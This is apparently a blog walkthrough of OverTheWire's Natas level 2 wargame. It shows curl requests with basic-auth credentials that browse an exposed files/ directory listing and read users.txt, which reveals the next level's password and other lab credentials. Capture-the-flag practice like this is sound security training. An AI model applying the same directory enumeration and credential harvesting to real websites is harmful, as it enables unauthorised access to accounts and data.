Username: natas2
Password: h4ubbcXrWqsTo7GGnnUMLppXbOogfBZ7
URL: http://natas2.natas.labs.overthewire.org
Nothing on the page? Yah, right… doubt it! Let’s go ahead and View Page Source
1
2
3
4
5
6
7
<body>
<h1>natas2</h1>
<div id="content">
There is nothing on this page
<img src="files/pixel.png">
</div>
</body>
Open image look not happen, so query location /files/
1
curl -i -X GET -u natas2:h4ubbcXrWqsTo7GGnnUMLppXbOogfBZ7 http://natas2.natas.labs.overthewire.org/files/
==> Looks <==
1
2
3
4
5
6
7
8
...
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="pixel.png">pixel.png</a></td><td align="right">2023-04-23 18:01 </td><td align="right">303 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="users.txt">users.txt</a></td><td align="right">2023-04-23 18:01 </td><td align="right">145 </td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
...
users.txt seems promising, so check curl with /users.txt/
1
2
3
4
5
6
7
8
9
10
curl -u natas2:h4ubbcXrWqsTo7GGnnUMLppXbOogfBZ7 http://natas2.natas.labs.overthewire.org/files/users.txt
==> Results
# username:password
alice:BYNdCesZqW
bob:jw2ueICLvT
charlie:G5vCxkVV3m
natas3:G6ctbMJ5Nb4cbFwhpMPSvxGHhQ7I6W8Q
eve:zo4mJWyNj2
mallory:9urtcpzBmH
Alright, we got the password! Moving on to level 3!
==> CTF: { natas3:G6ctbMJ5Nb4cbFwhpMPSvxGHhQ7I6W8Q }
Comments powered by Disqus.